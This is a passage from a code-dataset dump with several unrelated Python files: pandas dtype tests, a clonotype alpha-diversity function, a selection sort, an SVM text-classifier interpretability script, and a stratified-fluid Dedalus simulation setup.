Column(complex),\n }\n )\n df = pd.DataFrame(\n {\n \"int_col\": [1, 2, 3],\n \"float_col\": [1.0, 2.0, 3.0],\n \"str_col\": list(\"abc\"),\n \"bool_col\": [True, False, True],\n \"object_col\": [[1], 1, {\"foo\": \"bar\"}],\n \"complex_col\": [complex(1), complex(2), complex(3)],\n }\n )\n assert isinstance(schema(df), pd.DataFrame)\n assert schema.dtype[\"int_col\"] == PandasDtype.Int.str_alias\n assert schema.dtype[\"float_col\"] == PandasDtype.Float.str_alias\n assert schema.dtype[\"str_col\"] == PandasDtype.String.str_alias\n assert schema.dtype[\"bool_col\"] == PandasDtype.Bool.str_alias\n assert schema.dtype[\"object_col\"] == PandasDtype.Object.str_alias\n assert schema.dtype[\"complex_col\"] == PandasDtype.Complex.str_alias\n\n\n@pytest.mark.parametrize(\"python_type\", [list, dict, set])\ndef test_python_builtin_types_not_supported(python_type):\n \"\"\"Test unsupported python data types raise a type error.\"\"\"\n with pytest.raises(TypeError):\n Column(python_type)\n\n\n@pytest.mark.parametrize(\n \"pandas_api_type,pandas_dtype\",\n [\n [\"string\", PandasDtype.String],\n [\"floating\", PandasDtype.Float],\n [\"integer\", PandasDtype.Int],\n [\"categorical\", PandasDtype.Category],\n [\"boolean\", PandasDtype.Bool],\n [\"datetime64\", PandasDtype.DateTime],\n [\"datetime\", PandasDtype.DateTime],\n [\"timedelta64\", PandasDtype.Timedelta],\n [\"timedelta\", PandasDtype.Timedelta],\n [\"mixed-integer\", PandasDtype.Object],\n ],\n)\ndef test_pandas_api_types(pandas_api_type, pandas_dtype):\n \"\"\"Test pandas api type conversion.\"\"\"\n assert PandasDtype.from_pandas_api_type(pandas_api_type) is pandas_dtype\n\n\n@pytest.mark.parametrize(\n \"invalid_pandas_api_type\",\n [\n \"foo\",\n \"bar\",\n \"baz\",\n \"this is not a type\",\n ],\n)\ndef test_pandas_api_type_exception(invalid_pandas_api_type):\n \"\"\"Test unsupported values for pandas api type conversion.\"\"\"\n with pytest.raises(TypeError):\n PandasDtype.from_pandas_api_type(invalid_pandas_api_type)\n\n\n@pytest.mark.parametrize(\n \"pandas_dtype\", (pandas_dtype for pandas_dtype in PandasDtype)\n)\ndef test_pandas_dtype_equality(pandas_dtype):\n \"\"\"Test __eq__ implementation.\"\"\"\n assert pandas_dtype is not None # pylint:disable=singleton-comparison\n assert pandas_dtype == pandas_dtype.value\n\n\n@pytest.mark.parametrize(\"pdtype\", PandasDtype)\ndef test_dtype_none_comparison(pdtype):\n \"\"\"Test that comparing PandasDtype to None is False.\"\"\"\n assert pdtype is not None\n\n\n@pytest.mark.parametrize(\n \"property_fn, pdtypes\",\n [\n [\n lambda x: x.is_int,\n [\n PandasDtype.Int,\n PandasDtype.Int8,\n PandasDtype.Int16,\n PandasDtype.Int32,\n PandasDtype.Int64,\n PandasDtype.INT8,\n PandasDtype.INT16,\n PandasDtype.INT32,\n PandasDtype.INT64,\n ],\n ],\n [\n lambda x: x.is_nullable_int,\n [\n PandasDtype.INT8,\n PandasDtype.INT16,\n PandasDtype.INT32,\n PandasDtype.INT64,\n ],\n ],\n [\n lambda x: x.is_nonnullable_int,\n [\n PandasDtype.Int,\n PandasDtype.Int8,\n PandasDtype.Int16,\n PandasDtype.Int32,\n PandasDtype.Int64,\n ],\n ],\n [\n lambda x: x.is_uint,\n [\n PandasDtype.UInt8,\n PandasDtype.UInt16,\n PandasDtype.UInt32,\n PandasDtype.UInt64,\n PandasDtype.UINT8,\n PandasDtype.UINT16,\n PandasDtype.UINT32,\n PandasDtype.UINT64,\n ],\n ],\n [\n lambda x: x.is_nullable_uint,\n [\n PandasDtype.UINT8,\n PandasDtype.UINT16,\n PandasDtype.UINT32,\n PandasDtype.UINT64,\n ],\n ],\n [\n lambda x: x.is_nonnullable_uint,\n [\n PandasDtype.UInt8,\n PandasDtype.UInt16,\n PandasDtype.UInt32,\n PandasDtype.UInt64,\n ],\n ],\n [\n lambda x: x.is_float,\n [\n PandasDtype.Float,\n PandasDtype.Float16,\n PandasDtype.Float32,\n PandasDtype.Float64,\n ],\n ],\n [\n lambda x: x.is_complex,\n [\n PandasDtype.Complex,\n PandasDtype.Complex64,\n PandasDtype.Complex128,\n PandasDtype.Complex256,\n ],\n ],\n [lambda x: x.is_bool, [PandasDtype.Bool]],\n [lambda x: x.is_string, [PandasDtype.String, PandasDtype.String]],\n [lambda x: x.is_category, [PandasDtype.Category]],\n [lambda x: x.is_datetime, [PandasDtype.DateTime]],\n [lambda x: x.is_timedelta, [PandasDtype.Timedelta]],\n [lambda x: x.is_object, [PandasDtype.Object]],\n [\n lambda x: x.is_continuous,\n [\n PandasDtype.Int,\n PandasDtype.Int8,\n PandasDtype.Int16,\n PandasDtype.Int32,\n PandasDtype.Int64,\n PandasDtype.INT8,\n PandasDtype.INT16,\n PandasDtype.INT32,\n PandasDtype.INT64,\n PandasDtype.UInt8,\n PandasDtype.UInt16,\n PandasDtype.UInt32,\n PandasDtype.UInt64,\n PandasDtype.UINT8,\n PandasDtype.UINT16,\n PandasDtype.UINT32,\n PandasDtype.UINT64,\n PandasDtype.Float,\n PandasDtype.Float16,\n PandasDtype.Float32,\n PandasDtype.Float64,\n PandasDtype.Complex,\n PandasDtype.Complex64,\n PandasDtype.Complex128,\n PandasDtype.Complex256,\n PandasDtype.DateTime,\n PandasDtype.Timedelta,\n ],\n ],\n ],\n)\ndef test_dtype_is_checks(property_fn, pdtypes):\n \"\"\"Test all the pandas dtype is_* properties.\"\"\"\n for pdtype in pdtypes:\n assert property_fn(pdtype)\n\n\ndef test_category_dtype_exception():\n \"\"\"Test that category dtype has no numpy dtype equivalent.\"\"\"\n with pytest.raises(TypeError):\n # pylint: disable=pointless-statement\n PandasDtype.Category.numpy_dtype\n","sub_path":"tests/core/test_dtypes.py","file_name":"test_dtypes.py","file_ext":"py","file_size_in_byte":18594,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"408601563","text":"import numpy as np\nfrom ..util import _is_na\nfrom anndata import AnnData\nimport pandas as pd\nfrom typing import Union\nfrom ..io._util import _check_upgrade_schema\n\n\n@_check_upgrade_schema()\ndef alpha_diversity(\n adata: AnnData,\n groupby: str,\n *,\n target_col: str = \"clone_id\",\n inplace: bool = True,\n key_added: Union[None, str] = None\n) -> pd.DataFrame:\n \"\"\"Computes the alpha diversity of clonotypes within a group.\n\n Uses the `Shannon Entropy `__ as\n diversity measure. The Entrotpy gets\n `normalized to group size `__.\n\n Ignores NaN values.\n\n Parameters\n ----------\n adata\n Annotated data matrix\n groupby\n Column of `obs` by which the grouping will be performed.\n target_col\n Column on which to compute the alpha diversity\n inplace\n If `True`, add a column to `obs`. Otherwise return a DataFrame\n with the alpha diversities.\n key_added\n Key under which the alpha diversity will be stored if inplace is `True`.\n Defaults to `alpha_diversity_{target_col}`.\n\n Returns\n -------\n Depending on the value of inplace returns a DataFrame with the alpha diversity\n for each group or adds a column to `adata.obs`.\n \"\"\"\n # Could rely on skbio.math if more variants are required.\n def _shannon_entropy(freq):\n \"\"\"Normalized shannon entropy according to\n https://math.stackexchange.com/a/945172\n \"\"\"\n np.testing.assert_almost_equal(np.sum(freq), 1)\n if len(freq) == 1:\n # the formula below is not defined for n==1\n return 0\n else:\n return -np.sum((freq * np.log(freq)) / np.log(len(freq)))\n\n ir_obs = adata.obs.loc[~_is_na(adata.obs[target_col]), :]\n clono_counts = (\n ir_obs.groupby([groupby, target_col], observed=True)\n .size()\n .reset_index(name=\"count\")\n )\n\n diversity = dict()\n for k in sorted(ir_obs[groupby].unique()):\n tmp_counts = clono_counts.loc[clono_counts[groupby] == k, \"count\"].values\n tmp_freqs = tmp_counts / np.sum(tmp_counts)\n diversity[k] = _shannon_entropy(tmp_freqs)\n\n if inplace:\n key_added = \"alpha_diversity_\" + target_col if key_added is None else key_added\n adata.obs[key_added] = adata.obs[groupby].map(diversity)\n else:\n return pd.DataFrame().from_dict(diversity, orient=\"index\")\n","sub_path":"scirpy/_tools/_diversity.py","file_name":"_diversity.py","file_ext":"py","file_size_in_byte":2470,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"308041135","text":"def selection(x, ascending=True):\n\n if len(x) == 0: # X의 요소가 없는 경우 함수 실행 안함\n return False\n\n try:\n x = list(x) # X를 리스트로 변환할 수 없는 경우 함수 실행 안함\n except:\n return False\n \n if ascending: # ascending 인자의 값이 True인 경우 오름차순 정렬\n for i in range(len(x)-1):\n min_val = x[i] # value\n min_idx = i # index\n for j in range(i+1, len(x)):\n if min_val > x[j]:\n min_val = x[j]\n min_idx = j\n x[min_idx] = x[i]\n x[i] = min_val\n\n return x\n \n else:\n for i in range(len(x)-1):\n max_val = x[i] # value\n max_idx = i # index\n for j in range(i+1, len(x)):\n if max_val < x[j]:\n max_val = x[j]\n max_idx = j\n x[max_idx] = x[i]\n x[i] = max_val\n\n return x\n \n\nif __name__ == '__main__':\n\n import random\n\n before = random.sample(range(1, 100), 10)\n print('list',before)\n\n after = selection(before)\n print('ascending',after)\n\n before = random.sample(range(1, 100), 10)\n print('list',before)\n\n after = selection(before, False)\n print('descending',after)\n","sub_path":"Algorithms/Sorting/selection.py","file_name":"selection.py","file_ext":"py","file_size_in_byte":1324,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"340904481","text":"from sklearn.feature_extraction.text import TfidfVectorizer, CountVectorizer\nfrom sklearn import svm, metrics\n\nimport numpy as np\n\nimport eli5\nfrom eli5.lime import TextExplainer\nfrom eli5.sklearn import PermutationImportance\n\nfrom sklearn.pipeline import Pipeline, make_pipeline\n\n# Setup training/eval data\n\nXtrain = [\n\t\t\"I am a cat\",\n\t\t\"What do i cat\",\n\t\t\"a cat is where its at\",\n\t\t\"how about that cat\",\n\t\t\"the cat there sat\",\n\n\t\t\"I am a dog\",\n\t\t\"What do i dog\",\n\t\t\"a dog is where its at\",\n\t\t\"how about that dog\",\n\t\t\"the dog there sat\",\n\n\t\t\"I am a rat\",\n\t\t\"What do i rat\",\n\t\t\"a rat is where its at\",\n\t\t\"how about that rat\",\n\t\t\"the rat there sat\",\n\t\t]\n\n'''\nXtrain = [\n\t\t\"The cat (Felis catus) is a small carnivorous mammal.\",\n\t\t\"It is the only domesticated species in the family Felidae and often referred to as the domestic cat to distinguish it from wild members of the family.\",\n\t\t\"The cat is either a house cat, a farm cat or a feral cat\",\n\t\t\"Domestic cats are valued by humans for companionship and for their ability to hunt rodents.\", \n\t\t\"About cat breeds are recognized by anatomy various cat registries.\",\n\t\t\n\t\t\"The domestic dog (Canis lupus familiaris when considered a subspecies of the wolf\",\n\t\t\"or Canis familiaris dog when considered a distinct species) is a member of the genus Canis (canines)\",\n\t\t\"which forms part cat cat of dog the wolf-like canids, and is the most widely abundant terrestrial carnivore.\",\n\t\t\"The dog and the extant dog gray wolf are sister taxa as modern wolves are not closely related to the wolves\",\n\t\t\"that were first domesticated, dog which implies that the direct ancestor of the dog is extinct. \",\n\n\t\t\"Rats rat are various medium-sized, long-tailed rodents.\",\n\t\t\"Species of rat rats are found throughout the order Rodentia,\",\n\t\t\"but stereotypical rats are rat found in the genus Rattus. \",\n\t\t\"Other rat genera rat include Neotoma (pack rats),\",\n\t\t\"Bandicota (bandicoot rats) and rat Dipodomys (kangaroo rats).\",\n\t\t]\n'''\n\n#Ytrain = [0,0,0,0,0,1,1,1,1,1]\n#Ytrain = [0,0,0,0,0,1,1,1,1,1, 1,1,1,1,1]#2,2,2,2,2]\nYtrain = [0,0,0,0,0,1,1,1,1,1, 2,2,2,2,2]\n\nXeval = [\n\t\t\"it was a cat\",\n\t\t\"it was a dog\",\n\t\t\"it was a rat\",\n\n\t\t\"I watched cat where it sat\",\n\t\t\"I watched dog where it sat\",\n\t\t\"I watched rat where it sat\",\n\t\t\t\t\n\t\t\t]\n\n\n\n'''\nXeval = [\n\t\t\"The cat is similar in anatomy to the other felid species, \",\n\t\t\"has a strong flexible body, quick reflexes, sharp teeth and retractable claws cat adapted to killing small prey.\",\n\t\t\"Its night vision and sense of smell are well developed. Cat communication cat includes vocalizations like meowing, purring,\",\n\t\t\"trilling, hissing, growling and grunting as well as cat-specific body cat language. It is a solitary hunter, but a social species.\",\n\n\t\t\"Their long association with humans has led dogs to be uniquely dog attuned to human behavior\",\n\t\t\"and they are able to thrive on a starch-rich diet that would dog be inadequate for other canids.\",\n\t\t\"Dogs vary widely in shape, size and colors. They perform dog many roles for humans, such as hunting,\",\n\t\t\"herding, pulling loads, protection, assisting police dog and military, companionship and, more recently, aiding disabled people and therapeutic roles.\",\n\t\t\n\t\t\"Rats are typically distinguished rat from mice by their size.\" ,\n\t\t\"Generally, when someone discovers a rat large muroid rodent, \",\n\t\t\"its common name includes the term rat, while if it is smaller, \",\n\t\t\"its name includes the term mouse. The rat common terms rat and mouse are not taxonomically specific.\",\n\t\t]\n'''\n\nYeval = [0,1,2,0,1,2]\n#Yeval = [0,1,1,0,1,1,]#[0,1,2,0,1,2]#[0,0,0,0,1,1,1,1,2,2,2,2]\n#Yeval = [0,1,0,1]#[0,0,0,0,1,1,1,1,2,2,2,2]\n\n\n# define model\ntfidf = CountVectorizer()\n#tfidf = TfidfVectorizer(ngram_range=(1,1), sublinear_tf=True)\nclf = svm.SVC(max_iter=100, tol=1e-4, probability=True, \n\tkernel='linear', decision_function_shape='ovr' )\n\n#clf = svm.LinearSVC( )\n\nXtrain_tfidf = tfidf.fit_transform(Xtrain)\nclf.fit(Xtrain_tfidf, Ytrain)\n\n# fit model\npred = clf.predict(tfidf.transform(Xeval))\nprint(metrics.accuracy_score(pred, Yeval))\n\n# understanding features\nfn_src = np.array(tfidf.get_feature_names())\nvocab = tfidf.vocabulary_\nprint(fn_src)\n\ncoef = clf.coef_.toarray()\nprint(coef.shape)\n\nfor label in range(coef.shape[0]):\n\n\tprint('')\n\tprint(\"Label: \", label)\n\n\tcf = coef[label].reshape(-1)\n\n\torder = cf.argsort()\n\tcf = cf[order][::-1]\n\tfn = fn_src[:][order][::-1]\n\n\tfor f, c in zip(fn, cf):\n\t\tprint(f, vocab[f], c)\n\nprint(clf.intercept_)\nprint(tfidf.transform(Xeval).shape)\nprint(coef.shape)\n\n\n\nprint('--------------')\nprint('')\n\na = tfidf.transform(Xeval).toarray()\nb = clf.coef_.toarray().T\n\nprint(a.shape, b.shape)\n\ndec = np.dot(a, b)\n\nprint(dec.shape)\nprint(dec)\nprint(np.argmax(dec, axis = 1))\n\nprint(clf.decision_function(a))\n\n\n\nprint('--')\n\nprint(clf.decision_function_shape == 'ovr' and len(clf.classes_) > 2)\n\ndef _ovr_decision_function(predictions, confidences, n_classes):\n \"\"\"Compute a continuous, tie-breaking OvR decision function from OvO.\n\n It is important to include a continuous value, not only votes,\n to make computing AUC or calibration meaningful.\n\n Parameters\n ----------\n predictions : array-like, shape (n_samples, n_classifiers)\n Predicted classes for each binary classifier.\n\n confidences : array-like, shape (n_samples, n_classifiers)\n Decision functions or predicted probabilities for positive class\n for each binary classifier.\n\n n_classes : int\n Number of classes. n_classifiers must be\n ``n_classes * (n_classes - 1 ) / 2``\n \"\"\"\n n_samples = predictions.shape[0]\n votes = np.zeros((n_samples, n_classes))\n sum_of_confidences = np.zeros((n_samples, n_classes))\n\n k = 0\n for i in range(n_classes):\n for j in range(i + 1, n_classes):\n sum_of_confidences[:, i] -= confidences[:, k]\n sum_of_confidences[:, j] += confidences[:, k]\n votes[predictions[:, k] == 0, i] += 1\n votes[predictions[:, k] == 1, j] += 1\n k += 1\n\n max_confidences = sum_of_confidences.max()\n min_confidences = sum_of_confidences.min()\n\n if max_confidences == min_confidences:\n return votes\n\n # Scale the sum_of_confidences to (-0.5, 0.5) and add it with votes.\n # The motivation is to use confidence levels as a way to break ties in\n # the votes without switching any decision made based on a difference\n # of 1 vote.\n eps = np.finfo(sum_of_confidences.dtype).eps\n max_abs_confidence = max(abs(max_confidences), abs(min_confidences))\n scale = (0.5 - eps) / max_abs_confidence\n return votes + sum_of_confidences * scale\n\n'''\npredictions = dec < 0\nconfidences = -dec\nn_classes = len(clf.classes_)\n'''\nout = _ovr_decision_function(dec < 0, -dec, len(clf.classes_))\n\nprint(\"out:\")\nprint(out)\n'''\nprint(n_class, n_samples)\n\nvotes = np.zeros((n_samples, n_class))\nsum_of_conf = np.zeros((n_samples, n_class))\n\nk = 0\nfor i in range(n_class):\n\tfor j in range(i+1, n_class):\n\t\tprint(i, j, k)\n\t\tsum_of_conf[:, i] -= conf[:, k]\n\t\tprint (sum_of_conf)\n\t\tsum_of_conf[:, j] += conf[:, k]\n\t\tprint (sum_of_conf)\n\t\tvotes[pred[:, k] == 0, i] += 1\n\t\tvotes[pred[:, k] == 1, j] += 1\n\t\tk+=1\n\nprint(\"sum_of_conf\")\nprint(sum_of_conf)\nprint(\"sum_of_conf div\")\nprint((3 * (np.abs(sum_of_conf) +1)))\n\ntrans_conf = sum_of_conf / (3 * (np.abs(sum_of_conf) +1))\n#trans_conf = sum_of_conf / (2 * (np.abs(sum_of_conf) ))\nprint(\"trans_conf\")\nprint(trans_conf)\n\nout = votes + trans_conf\nprint(\"votes\")\nprint(votes)\n\nprint(\"out\")\nprint(out)\n\n\n\n\n\nprint('--------------')\nprint('')\n\nparams = clf.get_params()\nsv = clf.support_vectors_.toarray()\nnv = clf.n_support_\na = clf.dual_coef_.toarray()\nb = clf.intercept_\ncs = fn_src\nX = tfidf.transform(Xeval).toarray()\n\nprint(\"sv:\", sv.shape)\nprint(sv)\n\nprint(\"a:\", a.shape)\nprint(a)\n\nk = []\nfor vi in sv:\n\tprint('')\n\tprint(vi)\n\tprint(np.dot(vi, X))\n\tk.append(np.dot(vi, X))\n\t\n\n\n#k = [np.dot(vi, X) for vi in sv]\n\nprint(\"kernel:\", len(k))#len(k), len(k[0]))\nprint(k)\n\n\n\n#print(\"kernel:\", k)\n#print(nv)\n\n# define the start and end index for support vectors for each class\nstart = [sum(nv[:i]) for i in range(len(nv))]\nend = [start[i] + nv[i] for i in range(len(nv))]\n\nprint(\"start:\", start)\nprint(\"end:\", end)\n\n\n# calculate: sum(a_p * k(x_p, x)) between every 2 classes\n'''\n\n\n'''\nprint(\"a:\", a.shape)\nprint(a)\n#print(\"a[0]:\", a[0])\n\nfor i in range(len(nv)):\n\tfor j in range(i+1,len(nv)):\n\t\tfor p in range(start[j], end[j]):\n\t\t\tprint('')\n\t\t\tprint(i, j, p)\n\n\t\t\tprint(a[ i ][p])\n\t\t\tprint(k[p])\n\t\t\tprint(a[j-1][p])\n'''\n'''\nc = [ sum(a[ i ][p] * k[p] for p in range(start[j], end[j])) +\n sum(a[j-1][p] * k[p] for p in range(start[i], end[i]))\n for i in range(len(nv)) for j in range(i+1,len(nv))]\n\nprint(\"coeficients\")\nprint(np.array(c))\nprint(clf.coef_.toarray())\n\n# add the intercept\ndf = [sum(x) for x in zip(c, b)] \nprint(np.array(df))\n\nprint(clf.decision_function(X))\n'''\n\n'''\nperm = PermutationImportance(clf).fit(tfidf.transform(Xeval).toarray(), Yeval)\nout = eli5.show_weights(perm, feature_names=fn)\n\nprint(out.data)\n'''\n\n'''\n# build LIME TextExplainer\nte = TextExplainer(random_state=42)\npipe = make_pipeline(tfidf, clf)\nte.fit(Xeval[0], pipe.predict_proba)\n#out = te.show_prediction(target_names=[0,1])\nout = te.show_weights(target_names=[0,1])#eli5.show_weights(te, feature_names=tfidf.get_feature_names())\n\nprint(out.data)\n'''\n\n\n\n\n\n\n\n\n\n'''\nfeature_names_alpha = tfidf.get_feature_names()\nfeature_names = tfidf.vocabulary_\n\nfor j in range(X.shape[1]):\n\tprint(j, feature_names_alpha[j], [X[i][j] for i in range(X.shape[0])])\n'''\n'''\nclf = svm.SVC(tol=1e-4, probability=True, kernel='linear', \n\tdecision_function_shape='ovr' ).fit(Xmat, Y)\n\npipe = make_pipeline(tfidf, clf)\n\n\n\nte = TextExplainer(random_state=42)\nte.fit(Xeval, pipe.predict_proba)\nout = te.show_prediction(target_names=[0,1], feature_names=tfidf.get_feature_names())\n#out = te.show_weights(target_names=[0,1])\n\nprint(out.data)\n'''\n'''\n\nX_pmat = tfidf.transform(X_p).toarray()\nprint(X_pmat.shape, len(Y_p))\n\n#https://medium.com/towards-artificial-intelligence/how-to-use-scikit-learn-eli5-library-to-compute-permutation-importance-9af131ece387\nperm = PermutationImportance(clf).fit(X_pmat, Y_p)\nout = eli5.show_weights(perm, feature_names=feature_names_alpha)\n\n\nprint(out.data)\n'''\n\n\n'''\nimportance = clf.coef_.toarray()[0]\n\narray = ['']*len(feature_names)\n\nfor k in feature_names:\n\tarray[feature_names[k]] = k\n\nimportance, feature_names = zip(*sorted(zip(importance,feature_names)))\nimportance, feature_names = np.array(importance), np.array(feature_names)\n\nimportance = importance[::-1]\nfeature_names = feature_names[::-1]\n\nfor fn, imp in zip(feature_names, importance):\n\tprint(fn, imp)\n\nprint(clf.support_vectors_)\nprint(clf.support_)\nprint(clf.n_support_)\n'''\n\n'''\t\nimportance = clf.coef_.toarray()\nfeature_names = tfidf.vocabulary_\nsortedt_names = tfidf.get_feature_names()\n\nprint(feature_names)\nprint(len(importance[0]))\n\nfor k in sortedt_names:\n\tprint(k, importance[0][feature_names[k]])#, clf.coef_[1][feature_names[k]])\n'''","sub_path":"interp_test3.py","file_name":"interp_test3.py","file_ext":"py","file_size_in_byte":11024,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"301310613","text":"#!/usr/bin/env python\n'''\nhelper function to run the shared stratification scenario. user just has to\nspecify BCs and ICs\n'''\nimport logging\nimport os\nfrom collections import defaultdict\n\nimport h5py\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nfrom dedalus import public as de\nfrom dedalus.extras.flow_tools import CFL\nfrom dedalus.extras.plot_tools import quad_mesh, pad_limits\n\nSNAPSHOTS_DIR = 'snapshots_%s'\n\n###\n### UTILS\n###\n\ndef get_omega(g, h, kx, kz):\n return np.sqrt((g / h) * kx**2 / (kx**2 + kz**2 + 0.25 / h**2))\n\ndef get_vph(g, h, kx, kz):\n norm = get_omega(g, h, kx, kz) / (kx**2 + kz**2)\n return norm * kx, norm * kz\n\ndef get_analytical_sponge(name, z_pts, t, params):\n \"\"\" gets the analytical form of the variables for radiative BCs \"\"\"\n uz_anal = params['A'] * np.exp(z_pts / (2 * params['H'])) *\\\n np.cos(params['KZ'] * z_pts - params['OMEGA'] * t)\n rho0 = params['RHO0'] * np.exp(-z_pts / params['H'])\n analyticals = {\n 'uz': uz_anal,\n 'ux': -params['KZ'] / params['KX'] * uz_anal,\n 'rho1': -rho0 * params['A'] / (params['H'] * params['OMEGA']) *\\\n np.exp(z_pts / (2 * params['H'])) *\\\n np.sin(params['KZ'] * z_pts - params['OMEGA'] * t),\n 'P1': -rho0 * params['OMEGA'] / params['KX']**2 * params['KZ'] *\\\n uz_anal,\n }\n return analyticals[name]\n\ndef get_sponge(domain, params):\n sponge_strength = params['SPONGE_STRENGTH']\n zmax = params['ZMAX']\n damp_start = params['SPONGE_START']\n z = domain.grid(1)\n\n # sponge field\n sponge = domain.new_field()\n sponge.meta['x']['constant'] = True\n sponge['g'] = sponge_strength * np.maximum(\n 1 - (z - zmax)**2 / (damp_start - zmax)**2,\n np.zeros(np.shape(z)))\n return sponge\n\n###\n### IC\n###\n\ndef zero_ic(solver, domain, params):\n ux = solver.state['ux']\n uz = solver.state['uz']\n P = solver.state['P']\n rho = solver.state['rho']\n gshape = domain.dist.grid_layout.global_shape(scales=1)\n\n P['g'] = np.zeros(gshape)\n ux['g'] = np.zeros(gshape)\n uz['g'] = np.zeros(gshape)\n rho['g'] = np.zeros(gshape)\n\ndef bg_ic(solver, domain, params):\n ux = solver.state['ux']\n uz = solver.state['uz']\n P = solver.state['P']\n rho = solver.state['rho']\n gshape = domain.dist.grid_layout.global_shape(scales=1)\n z = domain.grid(1)\n\n ux['g'] = np.zeros(gshape)\n uz['g'] = np.zeros(gshape)\n rho['g'] = params['RHO0'] * np.exp(-z / params['H'])\n P['g'] = params['RHO0'] * (np.exp(-z / params['H']) - 1) *\\\n params['G'] * params['H']\n\n###\n### PROBLEM SETUP\n###\n\ndef _non_ns_bc(problem):\n ''' BCs for non-NS '''\n problem.add_bc('left(P) = 0', condition='nx == 0')\n problem.add_bc(\n 'left(dz(uz)) = - KZ * A * sin(KX * x - omega * t - 1 / (2 * KZ * H))',\n condition='nx != 0')\n problem.add_bc('right(uz) = 0', condition='nx != 0')\n problem.add_bc('left(uz) = 0', condition='nx == 0')\n\ndef _non_ns_p_bc(problem):\n ''' BCs for non-NS '''\n problem.add_bc('left(P) = -omega * RHO0 * A * KZ / KX ** 2 *' +\n 'cos(KX * x - omega * t - 1 / (2 * KZ * H))', condition='nx != 0')\n problem.add_bc('left(P) = 0', condition='nx == 0')\n problem.add_bc('right(uz) = 0')\n\ndef _non_ns_dp_bc(problem):\n ''' BCs for non-NS '''\n problem.add_bc('left(dz(P)) = omega * RHO0 * A * KZ**2 / KX ** 2 *' +\n 'sin(KX * x - omega * t + 1 / (KZ * H))', condition='nx != 0')\n problem.add_bc('left(P) = 0', condition='nx == 0')\n problem.add_bc('right(uz) = 0')\n\ndef _ns_bc(problem):\n ''' BCs for NS, dirichlet '''\n problem.add_bc('left(P) = 0', condition='nx == 0')\n problem.add_bc('left(uz) = A * cos(KX * x - omega * t)')\n problem.add_bc(\n 'left(ux) = -KZ / KX * A * cos(KX * x - omega * t - 1 / (2 * KZ * H))')\n problem.add_bc('right(uz) = 0', condition='nx != 0')\n problem.add_bc('right(ux) = 0')\n\ndef _ns_bc2(problem):\n ''' BCs for NS, dz(uz_z) '''\n problem.add_bc('left(P) = 0', condition='nx == 0')\n problem.add_bc('left(dz(uz_z)) = -KZ**2 * A * cos(KX * x - omega * t - 1 /'\n + '(KZ * H))', condition='nx != 0')\n problem.add_bc(\n 'left(ux) = -KZ / KX * A * cos(KX * x - omega * t - 1 / (2 * KZ * H))')\n problem.add_bc('right(uz) = 0', condition='nx != 0')\n problem.add_bc('left(uz) = 0', condition='nx == 0')\n problem.add_bc('right(ux) = 0')\n\ndef _ns_dp_bc(problem):\n ''' BCs for NS, pressure '''\n problem.add_bc('left(dz(P)) = omega * RHO0 * A * KZ**2 / KX ** 2 *' +\n 'sin(KX * x - omega * t + 1 / (KZ * H))', condition='nx != 0')\n problem.add_bc('left(dz(uz_z)) = -KZ**2 * A * cos(KX * x - omega * t - 1 /'\n + '(KZ * H))', condition='nx != 0')\n problem.add_bc('left(uz) = 0', condition='nx == 0')\n problem.add_bc('left(P) = 0', condition='nx == 0')\n problem.add_bc('right(uz) = 0')\n problem.add_bc('right(ux) = 0')\n\ndef _ns_bc_gradual(problem):\n ''' BCs for non-NS '''\n problem.add_bc('left(P) = 0', condition='nx == 0')\n problem.add_bc('left(uz) = A * cos(KX * x - omega * t) * (1 - exp(-t))')\n problem.add_bc(\n 'left(ux) = -KZ / KX * A * cos(KX * x - omega * t - 1 / (2 * KZ * H))'\n + ' * (1 - exp(-t))')\n problem.add_bc('right(uz) = 0', condition='nx != 0')\n problem.add_bc('right(ux) = 0')\n\ndef _sponge_lin(problem, domain, params, bc):\n '''\n puts a -gamma(z) * q damping on all dynamical variables, where gamma(z)\n is the sigmoid: damping * exp(steep * (z - z_sigmoid)) / (1 + exp(...))\n\n w/o nonlin terms\n '''\n problem.parameters['sponge'] = get_sponge(domain, params)\n problem.add_equation('dx(ux) + dz(uz) = 0')\n problem.add_equation(\n 'dt(rho) + sponge * rho - rho0 * uz / H' +\n '= 0')\n problem.add_equation(\n 'dt(ux) + sponge * ux + dx(P) / rho0' +\n '= 0')\n problem.add_equation(\n 'dt(uz) + sponge * uz + dz(P) / rho0 + rho * g / rho0' +\n '= 0')\n bc(problem)\n\ndef sponge_lin(problem, domain, params):\n _sponge_lin(problem, domain, params, _non_ns_bc)\n\ndef sponge_lin_p_bc(problem, domain, params):\n _sponge_lin(problem, domain, params, _non_ns_dp_bc)\n\ndef sponge_lin_dp_bc(problem, domain, params):\n _sponge_lin(problem, domain, params, _non_ns_p_bc)\n\ndef _sponge_nonlin(problem, domain, params, bc):\n ''' sponge zone velocities w nonlin terms '''\n problem.parameters['sponge'] = get_sponge(domain, params)\n problem.add_equation('dx(ux) + dz(uz) = 0')\n problem.add_equation(\n 'dt(rho) + sponge * rho - rho0 * uz / H' +\n '= -ux * dx(rho) - uz * dz(rho)')\n problem.add_equation(\n 'dt(ux) + sponge * ux + dx(P) / rho0' +\n '= 0')\n problem.add_equation(\n 'dt(uz) + sponge * uz + dz(P) / rho0 + rho * g / rho0' +\n '= 0')\n\n bc(problem)\n\ndef sponge_nonlin(problem, domain, params):\n _sponge_nonlin(problem, domain, params, _non_ns_bc)\n\ndef sponge_nonlin_dp_bc(problem, domain, params):\n _sponge_nonlin(problem, domain, params, _non_ns_p_bc)\n\ndef _ns_sponge_lin(problem, domain, params, bc):\n ''' navier-stokes sponge layer linear '''\n problem.parameters['sponge'] = get_sponge(domain, params)\n problem.add_equation('dx(ux) + uz_z = 0')\n problem.add_equation(\n 'dt(rho) + sponge * rho - rho0 * uz / H' +\n '= 0')\n problem.add_equation(\n 'dt(ux) + sponge * ux + dx(P) / rho0' +\n ' - NU * (dx(dx(ux)) + dz(ux_z))' +\n '= 0')\n problem.add_equation(\n 'dt(uz) + sponge * uz + dz(P) / rho0 + rho * g / rho0' +\n ' - NU * (dx(dx(uz)) + dz(uz_z))' +\n '= 0')\n problem.add_equation('dz(ux) - ux_z = 0')\n problem.add_equation('dz(uz) - uz_z = 0')\n 